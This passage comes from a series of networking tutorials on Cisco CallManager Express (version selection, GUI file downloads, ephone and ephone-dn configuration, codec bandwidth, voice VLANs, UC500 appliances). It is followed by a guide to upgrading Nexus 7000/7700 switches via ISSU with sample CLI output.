12.4(15)T
4.1
4.1.0.2
CME 4.1 Link
12.4(11)T
4.0(2)
4.0.3.1
CME 4.0(2) Link
12.4(9)T
4.0(0)
4.0.0.1
CME 4.0 Link
12.4(6)T
3.4
3.4.0.1
CME 3.4 Link

It is evident that there is a wide range of version to select from and as a general thumb of rule, the latest is the best option.

From experience, most version are stable enough for a production environment, however version 12.4.22T is an extremely buggy IOS version, especially when VPN tunnels are involved. It's best to try and avoid it.

As soon as the IOS version running on the router is identified, you'll need to download and install the necessary CME software and phone firmware files from the Cisco Software Download center.

For example, assume IOS version 12.4.24 (SP Services, Adv. IP services or Adv.Enterprise version) is installed on the router, according to the above table, it contains CME version 7.1 and will therefore require the relavent GUI files.

Note: You can also download the CCME GUI Interface files directly from Firewall.cx. For more information, visit our CCME GUI Download article.

To obtain and install these files, follow the relevant link on the column named 'Specifications Link'. This will load Cisco's page where you'll be able to find all necessary files for the CME version you require.

The Specifications Link page includes a wealth of information, that includes:

  • Supported Cisco IP Phones
  • Necessary firmware version for each IP Phone supported
  • Supported platform. E.g Cisco 1861, 2801, 2811, 2911 e.t.c
  • Supported devices per platform. E.g Cisco 1861 will support up to 12 IP Phones with CME version 7.1
  • Dram & Flash Memory requirements for the specific CME version
  • Compatible Voice Products. E.g Unity Express, VG224 and more

The Specifications Link page is extremely important as it can help you examine if you meet the requirements and save you a lot of time and trouble. It is strongly suggested the whole page is read, so the information contained is clearly understood.

When ready, click on the 'Cisco Software Download' link as shown below, to proceed with the download of the CME GUI files:

tk-cisco-ccme-gui-p1-1

This link will take you directly to the Cisco download area. Bare in mind that this will require a CCO account and possibly an account with permissions to download this software, otherwise no access will be provided.

As shown, the download area contains files for all CME versions, but the system will take you directly to the one selected, for our example, version 7.1.

If there's a small difference in the version e.g 7.1.0.1 instead of 7.1.0.0, it doesn't really matter as its more likely to contain small bug fixes and shouldn't create any problems.

tk-cisco-ccme-gui-p1-2

Notice that there are two similar files from which you can select. One named 'basic' and the other 'full'. The difference between each other is purely the amount of files included.

Here's the description for the 'Full Download':

CME 7.1 Full System Files for IOS 12.4(24)T releases. Includes MOH, Ringtones, 7970/71/75 Backgrounds, the following phone loads (7906/11, 7921/25, 7931, 7937, 7941/61, 7942/62, 7945/65, 7970/71, 7975) and updated GUI files for 12.4(24)T

And the 'Basic Download':

CME 7.1 basic system files for IOS 12.4(24)T releases, includes Basic Phone Loads (7906/11, 7921, 7937, 7941/61, 7942/62) with updated GUI for 12.4(24)T

Since the difference between the two is only 30Mb, it is suggested to always download the full version, regardless if required or not. It can be stored away just in case it is needed in the future. For this example, we will download both files, but install the one containing the basic system files.

To continue reading about the installation process of the Cisco CallManager Express GUI, please continue to Part 2 of our guide.



  • Hits: 187484

Cisco CallManager Express Basic Concepts - Part 2

Our previous article, Cisco CallManager Express Basic Concepts - Part 1 covered the very basic concepts of CCME and its operation. This article continues with the Cisco CallManager Express basic concepts will examine and analyse the ephone, ephone-dn concepts, how to configure ip phones and voip-bandwidth considerations.

Understanding Ephone & Ephone-dn

The Cisco CallManager Express system consists of a router (or simply a 'box' for the UC 500 series) that serves as a voice gateway (PBX) and one or more VLANs that connect IP phones and phone devices to the router.

tk-cisco-ccme-basic-concepts-8

All type of PBXs consist of physical phones and their internal directory numbers (extensions). The same concept applies in CallManager Express. The physical phones are referred to as 'ephone' which stands for 'Ethernet Phone' and the directory numbers as 'ephone-dn' short for 'Ethernet Phone Directory Number':

tk-cisco-ccme-basic-concepts-9

An ephone can represent any type/model of physical phone available and supported by Cisco. CallManager Express will recognise a physical phone device from its ephone configuration which also contains the device's MAC address.

For example, a Cisco 7945 IP Phone with a MAC address of 0027.0D3F.30B8 represents the ephone. Directory number 32 assigned to this phone represents the ephone-dn number.

Directory numbers are assigned to line buttons on phones during configuration.

This means that each physical IP Phone must be configured as an ephone. Cisco CallManager Express will recognise the physical phone from its ephone configuration MAC Address parameter.

tk-cisco-ccme-basic-concepts-10

Configuring an IP Phone in CME is a straightforward process and involves the creation of an ephone and ephone-dn entry.

The ephone holds the phone's MAC Address and button configuation, while the ephone-dn the directory number assigned to the IP Phone.

In the example above, the ephone 1 configuration binds the phone's first button (button 1) to the ephone-dn 20. Since ephone-dn 20 has been configured with directory number 300, the IP Phone will be assigned directory number 300.

To ensure we understand this concept, consider the following example:

tk-cisco-ccme-basic-concepts-11

Using the same scenario we've created three ephone-dn entries, a total of three directory numbers. We would now like to assign Phone 1, directory number 380. All that is required is to map button 1 to the approriate ephone-dn that contains number 380, that is ephone-dn 22. To achieve this, we issue the button 1:22 command under the ephone 1 configuration. IP Phone 1 now has directory number 380!

VoIP Bandwidth - Codecs

VoIP calls, just as any other network resource, require bandwidth. The amount of bandwidth required per call is governed by the type of codec configured by the system. Cisco CME and UC500 series support a variety of different codecs, making the system extremely flexible to cover any requirement.

By default, the codec used by Call Manager Express and UC500 series, is G.711 which requires 64Kbps of bandwidth – the same amount of bandwidth used by telecommunication providers for one call. Note that 64Kbps is the data payload, this means when captured into an Ethernet packet, the total amount of bandwidth will be the data payload plus the IP packet overhead, bringing the total amount to 87.2 Kbps. This is the actual bandwidth required per call per phone on an Ethernet network.

The amount of 87.2 Kbps might not seem large for an Ethernet network, however, when we need to pass the call over a WAN network this changes completely. WAN networks require bandwidth-optimised applications and services and there is no exception for VoIP calls.

For this reason, when we are dealing with situations that require optimised bandwidth control, we switch to different codecs that have much smaller bandwidth requirements, essentially allowing us to conserve precious bandwidth and money. In these cases, the G.729 codec is usually preferred, requiring only 31.2 Kbps, a generous saving of 56Kbps! In practice, this means that you can squeeze almost three G.729 VoIP calls using the same amount of bandwidth required by one G.711 VoIP call!

Apart from the evident difference in bandwidth requirements for each codec, there is also a noticeable difference in the quality of the call, G.711 being far superior in comparison with the G.729. To help provide an example, the quality of a G.711 call is similar to that of a call made between two ISDN land lines whereas a good example of G.729 quality would be a call between two mobile phones.

Taking in consideration that the quality of mobile phone calls is acceptable to everyone today, not many would complain if they had the same quality between site-to-site calls.

Of course there are other codecs that require a different amount of bandwidth, however, the two most important and popular are the G.711 and G.729 codecs. These codecs can be further configured to change their bandwidth requirements, but that's a topic to be covered in the future.

Summary

This article covered the introduction to Cisco's Call Manager Express which runs on Cisco routers and UC 500 series appliances (including UC520, UC540 & UC560). Basic concepts of VoIP technologies were introduced along with some important configuration theory related to CME's operation. Users interested can also read our Cisco CallManager Express Basic Concepts - Part 1 article.

 

  • Hits: 59699

Cisco CallManager Express Basic Concepts - Part 1

This article introduces basic CallManager Express (CCME) concepts by covering how a CCME router operates, how calls are setup between Cisco IP phones but also the role of a CCME router in this process. We'll talk about the importance of a Voice VLAN network allowing the segmentation between voice and data traffic, and how this is achieved. Next, we cover the interfaces (or ports) of a Cisco CME router, ISDN, FXS, FXO and other interfaces. Lastly, we take a look at the all-in-one Cisco UC devices (UC 500 series) designed for small business that require CME, Router , Firewall and Wireless controller bundled into one box.

How CCME, UC500, UC520, UC540 & UC560 Work

Before we plunge into CME initialisation & configuration, we need to introduce a few concepts and become familiar with them.

Understanding how basic functions of CallManager Express operate is crucial for the correct configuration and operation of the system. As mentioned, the CME runs on the Cisco router and provides its services to the network. IP Phones connected to the network via a switch are used to handle incoming and outgoing calls.

Once power is on, the IP phones will boot up and register with the Cisco CallManager Express. If configured, the CallManager Express will provide an extension for each IP phone and is then able to set up or tear down calls to or from the IP phones. The IP phones and CallManager Express router use a proprietary protocol called Skinny Client Control Protocol (SCCP) to communicate.

Below is a diagram illustrating roughly what goes on when one IP phone dials another IP phone, both connected to the same CallManager Express.

When a call is placed between two IP phones under the control of CallManager Express, the SCCP protocol is used to set the call up. SCCP is also commonly known as the 'skinny' protocol. The SCCP protocol is not used between two IP phones, but only between the IP phone and the Cisco CME system.

tk-cisco-ccme-basic-concepts-p1-1

Once the call is set up, the Realtime Transport Protocol (RTP) will be used to carry the audio stream. RTP is used to carry voice inside of IP packets. RTP is a common protocol that is used to carry time-sensitive traffic like voice and real-time video. RTP is carried inside of a UDP segment, which is then carried inside an IP packet.

When the telephone session between the two IP phones ends and they hang up, a signal will be sent from each IP phone to CME to inform the server of their new status.

Voice VLAN - Separating Data and Voice Traffic

Just like any network device IP phones generate traffic during a call. This is defined as Voice over IP, or VoIP traffic. VoIP traffic is extremely sensitive to network delays that occur from bottlenecks and unavailable bandwidth. If there is a lot of traffic on the network, chances are there will be problems with the voice stream between IP Phones and CME, voice cutting and jittering being the most common VoIP problems faced by networks.

To overcome these problems, Cisco always recommends to isolate the VoIP traffic from the data traffic no matter how large or small your network is. The isolation of VoIP traffic is accomplished by the creation of a separate VLAN marked as the 'Voice VLAN'. Cisco switches have built in mechanisms that will automatically identify and prioritise VoIP traffic. This type of design will ensure that VoIP packets will have higher priority than other packets, hence minimizing or eliminating the type of problems described.

If you are not familiar with the VLAN concept, you can read all about it in our VLAN section. It includes an in-depth analysis of the concept and contains diagrams to help the learning process.

To help get the picture, here is an example of a typical network that contains a Cisco CME router connected to the Internet and pstn network, along with a Cisco voice-capable switch (it is able to identify voice packets) with a couple of workstations and IP phones.

The concept is pretty straightforward, however, pay attention to how the Cisco CME router connects to the local network and how some IP phones connect to the network and workstations behind them. Due to the fact IP phones occupy a network port to connect to the local area network, Cisco has equipped most IP phones with a switch allowing a workstation to connect directly to the IP phone.

This method obviously has the advantage of cutting in half the required switchports for IP phones and workstations. In this scenario, the link from the switch to the IP phone is configured as a 'Trunk' link where as the link between the IP phone and workstation is configured as an 'Access' link.

Trunk links allow traffic from all VLANs to pass through them, whereas Access links allow only specific VLAN traffic. In our example, we have Access Links belonging to the Data VLAN (for the workstations) and also Voice VLAN (for the IP phones).

The general idea is that we use trunk links to the IP phone and from there an access link is provided for the network device, usually a workstation. If there is only one device connecting through one port, then this can also be configured as an access link assigned to the VLAN required.

The Cisco CallManager Express router almost always connects to the core switch via a trunk link, and has access to both Data and Voice VLANs as it should. Workstation traffic is routed to the Internet via the Data VLAN, whereas voice traffic is routed to the PSTN network via the Voice VLAN.

Router Interfaces - Voice Interfaces for CallManager Express

The Cisco CallManager Express system can act as the PSTN gateway as well as managing the IP phones. There are different types of connections to the PSTN including both digital, VoIP and analog connections. The type of connection used will be dependent on the density of connections needed, technology available in the region, cost of the connections and the interfaces present on the router.

The example below shows a Cisco 2801 router populated with 4 interfaces. Each interface is inserted into one of the available four slots and, once the router is powered up, if the IOS supports the interface installed it will automatically recognise it and provide the engineer access to the appropriate CLI commands so it can be configured.

tk-cisco-ccme-basic-concepts-p1-3

At this point, it is important to mention that there are over 90 different interface cards that can be used on Cisco routers. The two main types of interfaces are the Data interfaces and Voice interfaces.

As the name implies 'data interfaces' terminate WAN connections used to transfer/route data, whereas 'voice interfaces' terminate analogue or digital voice networks such PSTN, ISDN or PRI (E1/T1) lines, all used to carry voice.

Data interface examples are ADSL, Serial and ISDN Data cards. Below is serial data interface card normaly used to terminate leased lines connecting remote company offices with their headquaters:

tk-cisco-ccme-basic-concepts-p1-4

Voice interface examples are ISDN Voice cards, FXO (PSTN) and FXS cards. Below is a 4 port FXO card, used to terminate PSTN lines from the telco directly to the CCME router:

tk-cisco-ccme-basic-concepts-p1-5

The Cisco 2801 router in our example is able to handle up to 4 different interfaces, a maximum of two can be Data interface cards. This allows the following combinations:

a) 2 Data interface cards + 2 Voice interface cards

b) 4 Voice interface cards

Understanding a router's capabilities, capacity and where each voice card is used is critical to the design of a VoIP network and selection of the CME router. Cisco provides extensive information on all routers and available cards making it a lot easier to build your configuration.

Unified Communications 500 Series (includes UC520, UC540 & UC560)

tk-cisco-ccme-basic-concepts-p1-6

The Cisco Unified Communications 500 series is what many call a 'Cisco Swiss Army Knife'.

The UC500 series practically bridges a big gap for the Small-Medium Business market as the entry level before it was a Cisco router with CME enabled software.

The UC500 series is a small appliance that combines many functions into one compact design. Functions and services include:


  • Voice Gateway functions - fully featured PBX with integrated Auto Attendant
  • Multiple interface support to PSTN/ISDN Network via FXS, FXO & ISDN Interface cards
  • Voice Mail Support
  • VoIP Phones support, including Cisco's SMB series IP Phones, 7900 series IP Phones, SIP IP Phones and many more
  • Routing support
  • Firewall
  • Wireless networking support (optional)
  • VPN Support - allows termination of IPSec (Crypto) tunnels directly on the UC

The UC500 series runs on its own software which is identical to Cisco's Advanced Enterprise IOS running on Cisco routers. Configuration commands are identical to those of CME and therefore all examples analysed in our VoIP section can be applied to the Cisco UC500 series without a problem.

Summary

This article covered the introduction to Cisco's Call Manager Express - Part 1, which runs on Cisco routers and UC 500 series appliances (including UC520, UC540 & UC560). Basic concepts of VoIP technologies were introduced along with some important configuration theory related to CME's operation. Our next article continues with the CCME Basic Concepts - Part 2.

 

 

  • Hits: 139229

Introduction to Cisco Unified Communication Manager Express (CallManager Express - CME)

We have been hearing about VoIP for many years now and while some have never worked with it, it has become today's standard in IP Communications and Private Branch Exchange (PBX) or telephony center solutions.

Popular vendors such as Siemens, Panasonic, Alcatel and many more who, until recently, did not offer VoIP solutions saw the new wave coming and produced solutions that would allow their systems to support VoIP. However, these 'hybrid' products are not pure VoIP and do not support expected VoIP PBX features such as SIP Trunking with global providers, codec selections, H.323 call signalling protocol and more.

While Cisco never produced analogue or digital PBXs (thank goodness!) they started off right with the latest technology, which is VoIP. Carrying decades of experience with the largest portion of the switching and routing market, Cisco Call Manager and Call Manager Express were born.

Cisco CallManager, now officially named 'Cisco Unified Communication Manager' or CUCM, is a server-based IP Telephony solution and currently Cisco's flagship VoIP product. Scalable to support thousands of IP Phones by clustering multiple CUCM servers together, it is the ultimate pure VoIP solution for enterprise customers.

Recognising the need to penetrate into smaller markets, Cisco came out with a smaller version, Cisco CallManager Express, also known as CCME or CME. The new offical name here is Cisco Unified Communication Manager Express (CUCME), however most people still call it by its older name, that is CCME.

Cisco CallManager Express (CME) is a fully capable IP Telephony solution able to handle from 24 Phones up to 450 Phones depending on the router model. Perhaps the best part of CME is that it runs on Cisco routers and does not require separate hardware as is the case for CME.

Assuming you have a Cisco router, running CME can be as simple as upgrading your IOS and possibly DRAM memory. From there on, depending on your requirements, you can configure and use it immediately or you might require an additional upgrade. CallManager Express is extremely flexible because it is modular.

Downloading CallManager Express and Identifying Different Versions

CME is a software based IP Telephony system embedded in the following more advanced Cisco IOS versions. The Cisco IOS new packages are as follows and the highlighted ones provide CME functionality:

  1. IP Base
  2. IP Voice
  3. Enterprise Base
  4. Advanced Security
  5. SP Services
  6. Advanced IP Services
  7. Enterprise Services
  8. Advanced Enterprise Services

All four highlighted editions contain a full version of CME capable of covering most companies VoIP requirements.

The above IOS packages stand for all IOS upto 12.4. From version 12.5, Cisco has introduced the concept of a 'Universal IOS' that features all services (1 to 8) but are activated with the appropriate license! With IOS 15 and above, you must have a UC (Unified Communications) license activated in order to use and configure Cisco CallManager Express or voice services.

Cisco CME GUI files available for download at our Cisco CallManager Express (CCME) GUI Administration Files download page.

CME versions is also quite simple to follow. Depending on the IOS version, your CME version will also change. The latest available version at the date of writing this article is version 14.1 which is present in IOS XE version 17.11.

Cisco's Unified CME, Unified SRST, and Cisco IOS Software Version Compatibility Matrix is available for download in our Cisco IP Phone & VoIP Devices Firmware - Software download section.

Cisco CME Hardware Requirements

CME's requirements depend on the product version and platform on which it will be installed.

For example, the latest v8.1 requirements for a Cisco 2811 router are 256MB DRAM and at least 128MB Flash memory. This will provide support for up to 35 IP Phones. A Cisco 2851 router will support up to 100 IP Phones, however, it will require 384MB DRAM accompanied by at least 128MB Flash memory.

Obviously the Cisco 2851 router is a much larger model and is able to support more IP Phones, hence the increased requirements in DRAM.

With the new 2900 ISR series routers the requirements are pretty much the same for all models. For example, a Cisco 2901 router will support up to 35 IP Phones and requires 512MB DRAM with 256MB Flash memory. The Cisco 2951 will support up to 150 IP Phones and requires exactly the same amount of DRAM and Flash memory (512/256).

The reason for this is because Cisco has recently changed its IOS strategy and now provide a 'Universal' IOS that has all features built in (e.g Firewalling, VoIP, VPN etc), however, it requires an activation code in order to enable different services and functions - this might sound a great idea, but most Cisco engineers do not agree with Cisco's tactic as it seriously limits the IOS features you are able to 'test' on your routers.

Generally, if you would like to try out Cisco CallManager Express, then version 7.1 (IOS version 12.4.(24)T ) is a great starting point as it contains numerous bug fixes and enhancements. This version is also able to run on older Cisco 1760 series routers and is not tied to the licensing restrictions Cisco has introduced with IOS version 15 and above.

If you would like to learn more about CallManager Express, you can visit our Cisco CallManager Express Basic Concepts - Part 1 article.

Summary

This article introduced the Cisco CallManager Express system and covered the hardware it runs on.  Articles that follow in the voice section deal with the analysis of CallManager Express and UC500 series IP PBx's (Including UC520, UC540 & UC560) and cover from simple configuration to complex setups for demanding customers.

 

  • Hits: 88518
Nexus 7000/7700 Software Upgrade via ISSU

Nexus 7000/7700 Software Upgrade via ISSU. Complete Upgrade Guide, Configuration Check, Verifying ISSU Capability

nexus 7000 issu upgradeThis article shows how to perform an ISSU (In-Service Software Upgrade) on a Nexus Data Center switch (7000 and 7700 models) and avoid service and network disruption. We explain the importance of keeping your NX-OS software updated, how the upgrade process is executed, explain the purpose of the Kickstart and System images, provide methods on how to transfer the NX-OS images to the switch bootflash on both supervisor engines, verify ISSU capability and test/simulate the upgrade process.

In addition we cover useful commands to discover issues that might occur during the upgrade process, configuration backup methods, upgrading a Nexus 7000 and Nexus 7700 series with single or dual Supervisor Engines (SUP1 and SUP2 models).

Key Topics:

Related Articles

Why Upgrade Your Nexus 7000/7700 NX-OS Software

Upgrading your NX-OS can be a daunting task as there is always the risk something might go wrong. Despite this, it is very important to ensure your core Nexus switch is running one of the latest and supported images.

If you’re looking for reasons why to take the risk and upgrade, here are a few that might help convince:

  • Old NX-OS images might be stable but usually contain a number of bugs and security vulnerabilities that can put your core network and organization in risk.
  • Your NX-OS version might not be supported any more. This means that in an event of a failure or problem, Cisco Technical Assistance Center (TAC) might require you to upgrade to a supported NX-OS version before providing any support.
  • Support of new features, services and technologies. By upgrading to a newer NX-OS you’ll be able to take advantage of newer features that will now be supported.
  • Support of new Modules and Supervisor Engines. When considering upgrading your Nexus Supervisor Engines or adding new modules it’s likely an upgrade will be required to support them.
  • Peace of Mind. Knowing you’re on a supported, tested and patched up version always helps sleeping better at night!

It’s always recommended to perform a thorough research of the NX-OS version under consideration to identify caveats or issues that might affect your production environment. This information can be found on Cisco’s website or by opening a Cisco TAC Service Request.

What is an ISSU Upgrade?

The ISSU upgrade process provides us with the ability to upgrade a Nexus 7000/7700 switch without network or service disruption. During the ISSU process all Nexus modules and Supervisor Engines are fully upgraded without requiring a switch reboot.

Prerequisite for the ISSU upgrade is to have Dual Supervisor Engines and have an ISSU supported release loaded on your Nexus switch. The Dual Supervisor Engines are necessary as the ISSU process upgrades one Supervisor Engine at a time to keep the system up and running.

Cisco publishes a list of ISSU supported releases for every new NX-OS release. This means engineers should check the release notes of the candidate release they wish to upgrade to and see if their current version is amongst the ISSU supported releases.

Finally, an ISSU upgrade might be disruptive if there are configured features that are not supported on the new software image. We’ll show how you can test the ISSU upgrade process before initiating it.

How The ISSU Upgrade Works

Below is the process an ISSU upgrade follows on a Nexus 7000 with dual supervisor engines:

  1. Installation begins with the install all command.
  2. The installation process will verify the location and integrity of the new software image files.
  3. System verifies the operational status and the current software version of both supervisor engines and all switching modules to ensure that the system is capable of an ISSU.
  4. System initially upgrades all module cards bios/loader/bootrom.
  5. System loads the new software images to the standby supervisor engine and brings it up to the HA ready state.
  6. A supervisor switchover is then forced.
  7. The new software image is loaded on the formerly active (now standby) supervisor and brings it up to the HA ready state.
  8. A non-disruptive upgrade is performed on each of the switching modules starting from module 1.
  9. Finally, on a Nexus 7000 with SUP-1 supervisor engines, each Connectivity Management Processor (CMP) is upgraded one at a time.

During the ISSU upgrade the switch provides continuous update of its progress and no command input is possible until the upgrade has been completed.

The ISSU upgrade can be initialled via a SSH or Telnet session to the Nexus switch or directly from the active supervisor engine console port.

When a supervisor switchover occurs, it’s possible the SSH/Telnet session will be lost but you can re-connect immediately and continue to monitor the upgrade process by issuing the show install all status command. Alternatively connect to both supervisor engine console ports simultaneously.

Understanding Nexus Kickstart and System Images

The Nexus 7000 requires two images in order to run. First is a Kickstart image while the second is a System image.

Here’s what they look like:

NEXUS_7000# dir bootflash://sup-1/
392990621 Sep 08 11:14:54 2018 n7000-s1-dk9.6.2.20a.bin
 31178240 Sep 08 11:01:10 2018 n7000-s1-kickstart.6.2.20a.bin

The Kickstart image is around 31Mb-70Mb in size depending on the NX-OS version and contains the Linux kernel, basic drivers and initial file system. The System image is much larger, around 400Mb-650Mb in size depending on the NX-OS version and contains the system software and infrastructure code.

Transferring Images to Nexus 7000/7700 Switch

FTP is the recommended method of transfer. Thanks to the TCP transport protocol utilized by the FTP protocol, it is highly unlikely the image integrity will be compromised during the transfer.

Following are the possible locations where the image files can be stored on the Nexus:

  • bootflash: or  bootflash://sup-1/   (essentially the same location on supervisor engine 1)
  • bootflash://sup-2/ This is the supervisor engine 2 bootflash

Image transfer can be initiated using the ftp command as shown in the example below:

NEXUS_7000# copy ftp://192.168.1.1/n7000-s1-kickstart.6.2.20a.bin bootflash:
Enter vrf (If no input, current vrf 'default' is considered):
Enter username: cisco
Password:
[################# ] 29.55MB ***** Transfer of file Completed Successfully *****
Copy complete, now saving to disk (please wait)...

At this point we can transfer the image to the supervisor engine 2 bootflash using the command:

NEXUS_7000# copy ftp://192.168.1.1/n7000-s1-kickstart.6.2.20a.bin bootflash://sup-2/

or copy the image directly from supervisor engine 1 with the following command:

NEXUS_7000# copy bootflash://sup-1/n7000-s1-kickstart.6.2.20a.bin bootflash://sup-2/

The second method is faster and preferred.

Configuration Backup

Creating a configuration backup should be mandatory in any upgrade process. This can be achieved via a simple show running-configuration and copy-pasting the output to a text file, or using the Nexus CheckPoint feature.

Incompatible Configuration Check, Verifying ISSU Capability, Testing The Upgrade Process

Verifying the upgrade and ISSU process is an extremely important step and should never be skipped. Cisco’s release notes clearly state the supported ISSU Paths however executing the test commands shown in this section will reveal any incompatible configuration and provide a complete insight of what will happen during the upgrade.

Here are the two commands highly recommended to be executed before the upgrade. Both are non-disruptive:

  • show incompatibility system bootflash:<image> . Performs a configuration compatibility check that will highlight any configuration or features that might impact the upgrade process.
  • show install all impact kickstart bootflash:<image> system bootflash:<image> . Performs a simulated upgrade that verifies the new firmware integrity, ISSU upgrade process, provides detailed report of which module images will be upgraded and more.

Below is the output of each command. In this particular environment we are checking an upgrade from NX-OS  6.2(16) to 6.2(20a):

NEXUS_7000# show incompatibility system bootflash:n7000-s1-dk9.6.2.20a.bin
Checking incompatible configuration(s)
No incompatible configurations
Checking dynamic incompatibilities:
-----------------------------------
No incompatible configurations

The system has reported there are no issues with our configuration. Next, we execute a test/simulation of the upgrade process:

The show install all impact command will take a long time to complete as it simulates the upgrade process.

PH_NEXUS_7000# show install all impact kickstart bootflash:n7000-s1-kickstart.6.2.20a.bin system bootflash:n7000-s1-dk9.6.2.20a.bin

Installer will perform impact only check. Please wait.

Verifying image bootflash:/n7000-s1-kickstart.6.2.20a.bin for boot variable "kickstart".

[####################] 100% -- SUCCESS

Verifying image bootflash:/n7000-s1-dk9.6.2.20a.bin for boot variable "system".

[####################] 100% -- SUCCESS

Performing module support checks.

[####################] 100% -- SUCCESS

Verifying image type.

[# [####################] 100% -- SUCCESS

Extracting "lc1n7k" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "system" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "kickstart" version from image bootflash:/n7000-s1-kickstart.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "cmp" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[[####################] 100% -- SUCCESS

Extracting "cmp-bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[[####################] 100% -- SUCCESS

Notifying services about system upgrade.

[####################] 100% -- SUCCESS

Compatibility check is done:

Module      bootable           Impact           Install-type      Reason

------       --------      --------------      ------------       ------

     1         yes         non-disruptive       rolling 

     2         yes         non-disruptive       rolling 

     3         yes         non-disruptive       rolling 

     4         yes         non-disruptive       rolling 

     5         yes         non-disruptive         reset 

     6         yes         non-disruptive         reset 

     7         yes         non-disruptive       rolling 

     8         yes         non-disruptive       rolling 

     9         yes         non-disruptive       rolling 

    10        yes          non-disruptive       rolling 

<output omitted>

The key column here is the Impact column at the end. This confirms that our upgrade to the new image will be non-disruptive for every module including the supervisor engines (Modules 5 & 6). Supervisor engines will be reset (one at a time), but an automatic switchover between them will ensure there is no service disruption.

Performing the Nexus ISSU Upgrade

Once we are confident and ready we can proceed with the upgrade using the install all command. Keep in mind that if you’re connected via SSH, you’ll be disconnected from the SSH session as soon as the active supervisor engine is rebooted.

To reconnect and continue monitoring the installation process, SSH back in and issue the show install all status command. Alternatively you’ll need to be connected to both supervisor engines console ports. 

Once the initial checks are complete, you’ll be promoted to confirm with a "y" (yes) to continue with the installation

NEXUS_7000# install all kickstart bootflash:n7000-s1-kickstart.6.2.20a.bin system bootflash:n7000-s1-dk9.6.2.20a.bin

Installer will perform compatibility check first. Please wait.

Verifying image bootflash:/n7000-s1-kickstart.6.2.20a.bin for boot variable "kickstart".

[####################] 100% -- SUCCESS

Verifying image bootflash:/n7000-s1-dk9.6.2.20a.bin for boot variable "system".

[####################] 100% -- SUCCESS

Performing module support checks.

[####################] 100% -- SUCCESS

Verifying image type.

[# [####################] 100% -- SUCCESS

Extracting "lc1n7k" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "system" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "kickstart" version from image bootflash:/n7000-s1-kickstart.6.2.20a.bin.

[####################] 100% -- SUCCESS

Extracting "cmp" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[[####################] 100% -- SUCCESS

Extracting "cmp-bios" version from image bootflash:/n7000-s1-dk9.6.2.20a.bin.

[[####################] 100% -- SUCCESS

,

Notifying services about system upgrade.

[####################] 100% -- SUCCESS

Compatibility check is done:

Module      bootable         Impact         Install-type    Reason

------       --------      --------------    ------------   ------

     1         yes        non-disruptive       rolling 

     2         yes        non-disruptive       rolling 

     3         yes        non-disruptive       rolling 

     4         yes        non-disruptive       rolling 

     5         yes        non-disruptive         reset 

     6         yes        non-disruptive         reset 

     7         yes        non-disruptive       rolling 

     8         yes        non-disruptive       rolling 

     9         yes        non-disruptive       rolling 

    10        yes         non-disruptive       rolling 

Images will be upgraded according to following table:

Module       Image                  Running-Version(pri:alt)           New-Version  Upg-Required

------  ----------  ----------------------------------------  --------------------  ------------

     1      lc1n7k                                   6.2(16)              6.2(20a)           yes

     1        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     2      lc1n7k                                   6.2(16)              6.2(20a)           yes

     2        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     3      lc1n7k                                   6.2(16)              6.2(20a)           yes

     3        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     4      lc1n7k                                   6.2(16)              6.2(20a)           yes

     4        bios     v1.10.11(11/24/09):v1.10.11(11/24/09)    v1.10.21(11/26/12)           yes

     5      system                                   6.2(16)              6.2(20a)           yes

     5   kickstart                                   6.2(16)              6.2(20a)           yes

     5        bios     v3.22.0(02/20/10):  v3.22.0(02/20/10)     v3.22.0(02/20/10)            no

     5         cmp                                   6.2(16)              6.2(20a)           yes

     5    cmp-bios                                  02.01.05              02.01.05            no

     6      system                                   6.2(16)              6.2(20a)           yes

     6   kickstart                                   6.2(16)              6.2(20a)           yes

     6        bios     v3.22.0(02/20/10):  v3.22.0(02/20/10)     v3.22.0(02/20/10)            no

     6         cmp                                   6.2(16)              6.2(20a)           yes

     6    cmp-bios                                  02.01.05              02.01.05            no

     7      lc1n7k                                   6.2(16)              6.2(20a)           yes

     7        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     8      lc1n7k                                   6.2(16)              6.2(20a)           yes

     8        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

     9      lc1n7k                                   6.2(16)              6.2(20a)           yes

     9        bios     v1.10.13(03/15/10):v1.10.13(03/15/10)    v1.10.21(11/26/12)           yes

    10      lc1n7k                                   6.2(16)              6.2(20a)           yes

    10        bios     v1.10.11(11/24/09):v1.10.11(11/24/09)    v1.10.21(11/26/12)           yes

Do you want to continue with the installation (y/n)?  [n] y

Install is in progress, please wait.

Performing runtime checks.

[####################] 100% -- SUCCESS

Syncing image bootflash:/n7000-s1-kickstart.6.2.20a.bin to standby.

[####################] 100% -- SUCCESS

Syncing image bootflash:/n7000-s1-dk9.6.2.20a.bin to standby.

[####################] 100% -- SUCCESS

Setting boot variables.

[####################] 100% -- SUCCESS

Performing configuration copy.

[[####################] 100% -- SUCCESS

Module 1:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 2:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[[####################] 100% -- SUCCESS

Module 3:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 4:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[[####################] 100% -- SUCCESS

Module 5:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

